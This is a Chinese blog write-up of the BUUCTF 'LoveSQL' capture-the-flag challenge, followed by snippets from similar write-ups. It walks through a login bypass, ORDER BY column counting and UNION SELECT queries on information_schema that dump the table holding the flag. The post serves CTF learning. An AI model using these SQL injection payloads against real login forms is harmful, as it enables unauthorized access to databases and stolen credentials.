BUUCTF lovesql 1

最新推荐文章于 2024-08-14 15:09:27 发布
最新推荐文章于 2024-08-14 15:09:27 发布
阅读量409 收藏 9
点赞数 5
分类专栏: BUUCTF 文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_82505448/article/details/141093796
版权

我们使用万能密码登录进去

会获取到用户名和密码

Hello admin!

Your password is '0ed76caed1e7afe0bb1eaa590fa465ef'

我们使用一下order by,发现2,3没问题,当我们输入4列的时候,4列是不存在的

也就是说一共3列,我们使用一下联合查询

这里不能使用admin,这会覆盖掉后面的union,其他什么都行

我们登录进去

发现在2和3的地方有回显

我们把2改为database()

我们发现当前数据库时geek

ad' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'#

这样的话我们可以查到有两个tables,一个是geekuser 和I0ve1ysq1'

接下来我们就对这两个分别查一下

ad' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'#

Hello 2!

Your password is 'id,username,password'

我们查下一个

ad' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ce1ysql1'#

我们查到的字段是一样的

ad' union select 1,2,group_concat(id,username,password) from geek.geekuser#

我们可以根据格式看到id username和password

我们试一下第二个

ad' union select 1,2,group_concat(id,username,password) from geek.l0ve1ysq1#

Hello 2!

Your password is '1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3Z4cHAr7zCrbiao_ge_dddd_hm,40xC4m3llinux_chuang_shi_ren,5Ayraina_rua_rain,6Akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaoSyc_san_da_hacker,16flagflag{10e9d109-682f-4474-9759-8932b350b2af}'

我们可以查询到flag

我们使用sqlmap跑一下也可以,这个等学到后更新

L11没有1
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF LOVESQL
ANYOUZHEN的博客
05-16 506
打开网页后,利用hackbar,先来查询他的列数 1‘ order by 3# 试了1,2,3,4都不行,初步判断#是被后端代码过滤掉了,我们试试--+,和#的效果是一样的 但是当我尝试使用--+后发现仍然没有反应,说明后端代码也过滤掉了--+,我们采用另外一种方式,使用%23 当我把3改为4时,出现了,说明列数为3,接下来好办了,老套路 使用联合查询:1’ union select 1,2,3 %23 2,3有回显,说明2,3存在注入点 找数据库 ?username=1.
BuuCTF lovesql
qq_49746811的博客
08-06 232
#进入页面后首先进行测试发现为字符型需要闭合 后需要注释 -1' order by 4# 4换成三后提示密码错误 可知为三列 #继续查询数据库名称 可知数据库名为geek 查询数据库名称 -1' union select 1,2,batabase()# -1' union select 1,2,(select group_caoncat(table_name) from information_schema.tables where table_schema = 'geek')#查询数据库内表
BUUCTF Web [极客大挑战 2024]LoveSQL_buuctf lovesql
06-24 941
进入题目连接是一个「登录」界面登录「成功」会显示当前用户的账号和密码登录「失败」则会则会提示错误的用户名和密码。
BUUCTF-LoveSQL1
m0_74167420的博客
03-13 1633
构造新的payload:username=adminn ' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1。(2)测试了几次到100也没有爆出字段,也将#进行了url编码,更换万能账户再次测试,测试成功。(1)在成功登录的基础上使用联合注入语法知识进行,首先使用 order by 判断字段数。表爆出成功,发现两个表名。
buuctf-loveSQL
xixihahawuwu的博客
11-23 1279
进入界面 没有什么明显的提示,上次有个一样界面的题目,结果直接万能密码1=1出来了,这次再试试 ?????? 啥? 简单的我有点不相信,睿智的我一下子就觉得不对经 去尝试一下MD5 就知道… 算了,接着找吧 看题目名字,lovesql 估计还是注入 只能把目标放在url上了 这边比较恶心,url转码烦死我了,老是弄乱 查询一下列 ’ order by 4%23 到四的时候报错 说明3是一个临界点,即列数为3 。。。。。 然而到这里我懵逼了,不知道要干啥了… 晕晕乎乎的。一点思路找不到… 去看了.
Buuctf [极客大挑战 2019]LoveSQL 1
m0_64444909的博客
07-21 699
代码】BuuCTF[极客大挑战2019]LoveSQL1。
buuctf_LoveSQL
qq_61968245的博客
12-22 2641
0x01 题目链接 BUUCTF在线评测BUUCTF 是一个 CTF 竞赛和训练平台,为各位 CTF 选手提供真实赛题在线复现等服务。https://buuoj.cn/challenges 0x02 题目
buuctf-LoveSql
m0_62094846的博客
11-11 652
(测试是否为注入) 尝试用万能密码 但这串东西没什么用,不过我们可以知道用户名是admin 在url上注入,判断字段数目 说明有3个字段 然后可以查找数据库了 前面几个数据库每个都有,flag应该在test或者geek中 查找test什么都没有,一定是在geek了 根据标题lovesql,猜测应该在10ve1ysq1中 发现好像没什么有用信息,一个一个试,在username中得到了不一样的信息 最后一串就是flag了 ...
BUUCTF Web [极客大挑战 2019]LoveSQL_buuctf lovesql(1)
2401_84247423的博客
05-16 914
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;CFT有个不成文的「规矩」,SQL注入漏洞中,flag通常会放在当前使用的数据库中。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF部分web题目
05-06
### BUUCTF部分Web题目分析 #### WMCTF2020 Make PHP Great Again **题目背景**: 这道题目主要是考察PHP中的`require_once()`函数的使用以及如何利用符号链接来读取文件。 **核心知识点**: 1. **`require_once()...
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
Linux日常运维小结
最新发布
lza20001103的博客
08-14 360
Linux日常运维小结
16 交换机命令行配置
weixin_48089507的博客
08-11 223
【代码】15 交换机命令行配置。
服务器数据恢复—raid5阵列热备盘未全部启用导致阵列崩溃的数据恢复案例
beiya123的博客
08-14 109
服务器存储数据恢复环境: 一台EMC某型号存储中有一组RAID5磁盘阵列。该raid5阵列中有12块硬盘,其中2块硬盘为热备盘。 服务器存储故障: 该存储raid5阵列中有两块硬盘离线,只有1块热备盘启用替换掉其中一块离线盘,另外1块热备盘未成功启用,raid5阵列崩溃,存储不可用。 磁盘阵列中硬盘离线的原因通常是磁盘存在物理故障或者硬盘出现坏道。由于EMC存储中的raid控制器的磁盘检查策略十分严格,经常将硬盘的性能不稳定判定为硬件故障并将该硬盘踢出raid。
将A服务器上指定文件夹中的文件,批量同步到B服务器
大数据-攻城狮
08-14 84
【代码】将A服务器上指定文件夹中的文件,批量同步到B服务器上。
buuctf lovesql
08-10
BUUCTFSQLLoveSQL)是一个CTF竞赛中的SQL注入题目。根据引用和引用的描述,该题目涉及到了SQL注入漏洞,其中表名是l0ve1ysq1。为了解题,可以通过在URL中注入一些SQL语句来获取相关信息。其中,通过注入以下语句可以爆出表的列名: /check.php?username= 1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' #&password=1 [1 [3] 这样可以获取到l0ve1ysq1表的列名。进一步的解题过程包括读取表中的内容以及获得flag。具体的解题步骤和细节可以参考引用中的描述。123 #### 引用[.reference_title] - *1* *2* *3* [【BUUCTF】[极客大挑战 2019]LoveSQL 详细题解总结笔记 Writeup](https://blog.csdn.net/vanarrow/article/details/107991185)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值